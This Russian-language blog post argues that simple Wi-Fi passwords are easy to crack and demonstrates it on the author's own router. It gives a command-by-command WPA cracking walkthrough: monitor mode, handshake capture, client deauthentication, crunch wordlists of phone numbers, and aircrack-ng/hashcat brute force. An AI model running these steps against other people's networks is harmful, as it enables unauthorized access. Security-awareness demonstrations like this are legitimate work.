Cтатейка не о том, как взломать, точнее подобрать пароль к Wi-Fi, а чего не стоит делать. Простые пароли к вашему Wi-Fi, не углубляясь в теорию, или рассказывая сказки, как могут взломать. Я покажу на собственном примере, хотя я и знаю свой пароль на своем Wi-Fi роутере, как я к нему подберу пароль. Некоторые скажут: ну, дорвался сосед к халявному интернету, ну и что? Не тут то и было. Чуть дальше я покажу опять же на собственном примере, как перехватывают пароли к Mail.ru различным сайтам и кошелькам и тд.
Что мы имеем:
1) Ноутбук или (Компьютер) для перехвата и подбора пароля + USB TP-LINK TL-WN722N.
2) Смартфон уже подключенный к Wi-Fi роутеру.
Поехали. Все это безобразие будем делать на Linux Mint, но лучше всего Live Kali Linux так как там уже предустановленны сетевые шняжки Aircrack-ng и тд. и на других дистрибутивах Ubuntu, Debian даже на FreeBSD и Windows все это можно проделать.
Предположим, что вы уже скачали, запустились с Флешки-CD-DVD или 3,5 или 5,24 дискеты.
Открываю терменалку и выполню команду airmon-ng, чтобы узнать как мой wi-fi USB-адаптер определился.
# sudo airmon-ng
Определился как интерфейс wlxf81a671b1f5b, теперь переводим wifi-клиент в режим монитора:
# sudo airmon-ng start wlxf81a671b1f5b
wlxf81a671b1f5b Atheros AR9271 ath9k - [phy1]
(monitor mode enabled on mon0)
Создался виртуальный интерфейс mon0
Теперь сканирую эфир с помощью airodump-ng:
# sudo airodump-ng mon0
Нахожу свой Wi-Fi роутер в списке моих соседей, как и писал выше буду перехватывать пароль сам у себя.
Переключяюсь:
# sudo airodump-ng -w USSR -c 7 --bssid 34:CE:00:2E:B2:03 mon0
-w – название дамп-файла
-c – номер канала
–bssid – MAC-адрес точки доступа
Перехват возможен тогда, когда к Wi-Fi роутеру подключен клиент.
11
Оставляю окно терминала, где работает airodump-ng открытым. Открываю новое окно, в котором пишу:
# sudo aireplay-ng -0 3 -a 34:CE:00:2E:B2:03 -c 78:11:DC:43:1A:AD mon0
эта команда заставляет переподключиться, тем самым отправить пароль на роутер
Проверяю командой успело ли перехватить ключик или нет, если нет - повторяю
(sudo aireplay-ng -0 3 -a 34:CE:00:2E:B2:03 -c 78:11:DC:43:1A:AD mon0)
# aircrack-ng handshaketest-01.cap
# BSSID ESSID Encryption
1 34:CE:00:2E:B2:03 USSR WPA (1 handshake)
Все ОК. Для того, чтобы расшифровать, нам нужен словарь, сделаем не большой словарь из мобильных телефонов 067******* Киевстара.
#crunch 10 10 1234567890 -t 067@@@@@@@ -o kyivstar067.txt
Теперь приступаем к расшифровке
# aircrack-ng -l password.txt -w kyivstar067.txt -0 USSR-01.cap
Если пароль удалось подобрать, что у меня и получилось, вижу красную яркую надпись
KEY FOUND! [ 0671111111 ]
так же пароль продублирован в файле password.txt
Так же есть еще один способ подбора пароля без словаря с помощью Crunch или Hashcat он скорее удобен если мы хотим подобрать цифровой или
допустим знаем, что пароль состоит из слова natasha*** и пару цифр.
# crunch 10 10 -t 06711111%% | aircrack-ng -l ussr.txt -w - -e USSR USSR-01.cap
# hashcat --stdout -a 3 0671111?d?d?d | aircrack-ng -l ussr.txt -w - -e USSR USSR-01.cap
Еще не большая хитрость, для того что бы закрыть терминальное окно, не закрывая процесс подбора пароля,
есть замечательная утилита Nohup*
А теперь о выше сказанном, подбор пароля по словарю 067******* заняло 3ч и при условии, что у меня процессор устаревший Intel Pentium Dual Core, если пароль просто цифровой из 8 цифр, подбор пароля занимает +/- 12часов, из 10 цифр уже сложнее и дольше, а вот хотя бы 1 буква или спец знак @#$%^&& почти не реально, hashcat может справиться быстрее если у вас майнинг ферма, перебросить вычислительный процесс на видео карты.
Т.е. 1 это центральные процессор, а 2 это графический процессор, тогда команда вместе с выбором всех доступных устройств будет выглядеть -D 1,2
А так же появился более понятнее инструмент для взлома пароля беспроводной сети, это Wifite, но про него я думаю не буду писать статейку сама суть статьи что простые пароли взламываются элементарно
Коментувати